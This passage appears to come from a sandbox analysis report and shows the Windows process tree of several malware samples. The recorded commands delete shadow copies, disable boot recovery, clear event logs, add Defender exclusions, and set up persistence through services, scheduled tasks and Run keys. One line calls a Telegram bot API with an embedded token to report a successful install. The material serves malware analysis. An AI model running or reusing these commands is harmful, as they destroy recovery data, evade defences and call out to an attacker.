      "C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe"
      4⤵
      PID:5200
  - - C:\Users\Admin\AppData\Local\Temp\Files\kldrgawdtjawd.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\kldrgawdtjawd.exe"
      4⤵
      PID:4164
  - - C:\Users\Admin\AppData\Local\Temp\Files\Avos.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Avos.exe"
      4⤵
      PID:2108
    - - C:\Windows\system32\cmd.exe
        
        cmd /c wmic shadowcopy delete /nointeractive
        5⤵
        
        PID:4192
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete /nointeractive
        6⤵
        
        PID:6224
    - - C:\Windows\system32\cmd.exe
        
        cmd /c vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        
        PID:3200
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        6⤵
        Interacts with shadow copies
        
        PID:1568
    - - C:\Windows\system32\cmd.exe
        
        cmd /c bcdedit /set {default} recoveryenabled No
        5⤵
        
        PID:1240
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:6344
    - - C:\Windows\system32\cmd.exe
        
        cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        
        PID:2736
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:5872
    - - C:\Windows\system32\cmd.exe
        
        cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        5⤵
        
        PID:4224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4932
  - - C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe"
      4⤵
      PID:6484
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Tall Tall.bat & Tall.bat
        5⤵
        
        PID:3960
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5476
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        6⤵
        
        PID:5112
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:10788
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        6⤵
        
        PID:7512
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 349877
        6⤵
        
        PID:5948
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "ORDINANCECHILDHOODCONVERTENDORSED" Booty
        6⤵
        
        PID:6644
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Norwegian + ..\Mysql + ..\Tours + ..\Awareness + ..\Picking K
        6⤵
        
        PID:6124
      - C:\Users\Admin\AppData\Local\Temp\349877\Faced.pif
        
        Faced.pif K
        6⤵
        
        PID:4332
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn "BioMind" /tr "wscript //B 'C:\Users\Admin\AppData\Local\BioTech Dynamics\BioMind.js'" /sc onlogon /F /RL HIGHEST
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
        7⤵
        
        PID:4480
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 15
        6⤵
        
        PID:8036
  - - C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe"
      4⤵
      PID:3396
  - - C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
      4⤵
      PID:4344
    - - C:\Users\Admin\AppData\Local\Temp\303203558.exe
        
        C:\Users\Admin\AppData\Local\Temp\303203558.exe
        5⤵
        
        PID:4412
  - - C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"
      4⤵
      PID:4368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Attacked Attacked.bat & Attacked.bat
        5⤵
        
        PID:10724
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:10812
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        6⤵
        
        PID:4068
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:9104
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        6⤵
        
        PID:8140
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 347861
        6⤵
        
        PID:7896
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "systemadaptermeetingskenneth" Grow
        6⤵
        
        PID:5868
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Officer + ..\Essays + ..\Cool + ..\Prompt + ..\Itunes G
        6⤵
        
        PID:6092
      - C:\Users\Admin\AppData\Local\Temp\347861\Councils.pif
        
        Councils.pif G
        6⤵
        
        PID:8624
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
      4⤵
      PID:3824
  - - C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
      4⤵
      PID:4460
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
        5⤵
        
        PID:7136
      - C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
        6⤵
        
        PID:3916
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c mkdir "\\?\C:\Windows \System32"
        7⤵
        
        PID:6536
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows \System32\printui.exe"
        7⤵
        
        PID:5336
        
        C:\Windows \System32\printui.exe
        
        "C:\Windows \System32\printui.exe"
        8⤵
        
        PID:8480
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
        9⤵
        
        PID:1428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1680
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c sc create x492830 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x492830\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x492830.dat" /f && sc start x492830
        9⤵
        
        PID:2424
        
        C:\Windows\system32\sc.exe
        
        sc create x492830 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
        10⤵
        Launches sc.exe
        
        PID:6980
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SYSTEM\CurrentControlSet\services\x492830\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x492830.dat" /f
        10⤵
        Modifies registry key
        
        PID:2728
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
        9⤵
        
        PID:1044
        
        C:\Windows\System32\console_zero.exe
        
        "C:\Windows\System32\console_zero.exe"
        10⤵
        
        PID:5332
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
        9⤵
        
        PID:8540
        
        C:\Windows\System32\bav64.exe
        
        "C:\Windows\System32\bav64.exe"
        10⤵
        
        PID:8688
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@BCXRJFKE: Installed success.'});"
        9⤵
        
        PID:9552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@BCXRJFKE: Installed success.'});"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9624
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
        9⤵
        
        PID:9192
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 14 /nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:632
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
        9⤵
        
        PID:6760
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 16 /nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:10980
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
        7⤵
        
        PID:4324
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 10 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4424
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
        5⤵
        
        PID:7132
      - C:\Windows\system32\timeout.exe
        
        timeout /t 10 /nobreak
        6⤵
        Delays execution with timeout.exe
        
        PID:6656
  - - C:\Users\Admin\AppData\Local\Temp\Files\ew.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"
      4⤵
      PID:4476
  - - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
      4⤵
      PID:4508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:6528
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
        PID:9728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:8
  2⤵
  PID:10300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:8
  2⤵
  PID:10460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2176 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:2
  2⤵
  PID:10572

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2968

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" shell32.dll,Options_RunDLL 7
1⤵
PID:772

C:\Windows\system32\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureCloud Harbor Inc\SafeHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & exit
1⤵
PID:2484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:7492
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5064

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:7712

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
1⤵
PID:9744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:7852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fefb8d9758,0x7fefb8d9768,0x7fefb8d9778
  2⤵
  PID:3720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1408,i,3279627662234259388,7984941076598197068,131072 /prefetch:2
  2⤵
  PID:8792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1548 --field-trial-handle=1408,i,3279627662234259388,7984941076598197068,131072 /prefetch:8
  2⤵
  PID:9204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1392 --field-trial-handle=1408,i,3279627662234259388,7984941076598197068,131072 /prefetch:8
  2⤵
  PID:9468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2196 --field-trial-handle=1408,i,3279627662234259388,7984941076598197068,131072 /prefetch:1
  2⤵
  PID:8044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1544 --field-trial-handle=1408,i,3279627662234259388,7984941076598197068,131072 /prefetch:1
  2⤵
  PID:7312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1148 --field-trial-handle=1408,i,3279627662234259388,7984941076598197068,131072 /prefetch:2
  2⤵
  PID:10060

C:\Windows\system32\taskeng.exe
taskeng.exe {AF82FE37-9504-4662-9E10-C2F0E58A042D} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
1⤵
PID:7696
- C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
  "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
  2⤵
  PID:4868

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & echo URL="C:\Users\Admin\AppData\Local\EduInno Dynamics\EduCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & exit
1⤵
PID:7356

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:10804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:6088
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6560

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:10204

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
1⤵
PID:10004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --proxy-server="217.65.2.14:3333"
1⤵
PID:2884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fefb8d9758,0x7fefb8d9768,0x7fefb8d9778
  2⤵
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1328,i,303831911748296307,7362960654408906252,131072 /prefetch:2
  2⤵
  PID:2120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --proxy-server=217.65.2.14:3333 --mojo-platform-channel-handle=1480 --field-trial-handle=1328,i,303831911748296307,7362960654408906252,131072 /prefetch:8
  2⤵
  PID:3292

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:9428
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5084.0.212303004\1399273680" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1168 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b529289-6b5b-4ae5-a7c9-7ab4ce200d19} 5084 "\\.\pipe\gecko-crash-server-pipe.5084" 1340 4cb3558 gpu
    3⤵
    PID:5208

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
1⤵
PID:10208
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:10208 CREDAT:275457 /prefetch:2
  2⤵
  PID:4772

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:3872

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x49c
1⤵
PID:2184

C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
1⤵
PID:8216

C:\Windows\system32\timeout.exe
timeout 1
1⤵
- Delays execution with timeout.exe
PID:8776

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
1⤵
PID:10880

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
1⤵
PID:7776

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
1⤵
PID:688

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
1⤵
PID:5984

C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
1⤵
PID:7308
- C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
  "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
  2⤵
  PID:4360

C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
1⤵
PID:3848

C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
1⤵
PID:7836
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2DB.tmp\B2DC.tmp\B2DD.bat C:\Windows\system32\java.exe"
  2⤵
  PID:9704
- - C:\Windows\system32\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:7848
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
    3⤵
    PID:7996
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
    3⤵
    PID:10740
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
    3⤵
    PID:4672
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
    3⤵
    PID:3084
- - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
    "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
    3⤵
    PID:3380
  - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
      "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
      4⤵
      PID:4576
- - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
    "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
    3⤵
    PID:11036
- - C:\Windows\system32\java.exe
    "C:\Windows\system32\java.exe"
    3⤵
    PID:6764
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BCCA.tmp\BCCB.tmp\BCCC.bat C:\Windows\system32\java.exe"
      4⤵
      PID:6168
    - - C:\Windows\system32\timeout.exe
        
        timeout 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6260
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        5⤵
        
        PID:10708
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        5⤵
        
        PID:524
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        5⤵
        
        PID:3008
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        5⤵
        
        PID:2488
    - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        5⤵
        
        PID:1952
      - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        6⤵
        
        PID:3344
    - - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        5⤵
        
        PID:2528
    - - C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        5⤵
        
        PID:2396
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C66B.tmp\C66C.tmp\C66D.bat C:\Windows\system32\java.exe"
        6⤵
        
        PID:2440
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2276
        
        C:\Windows\system32\reg.exe
        
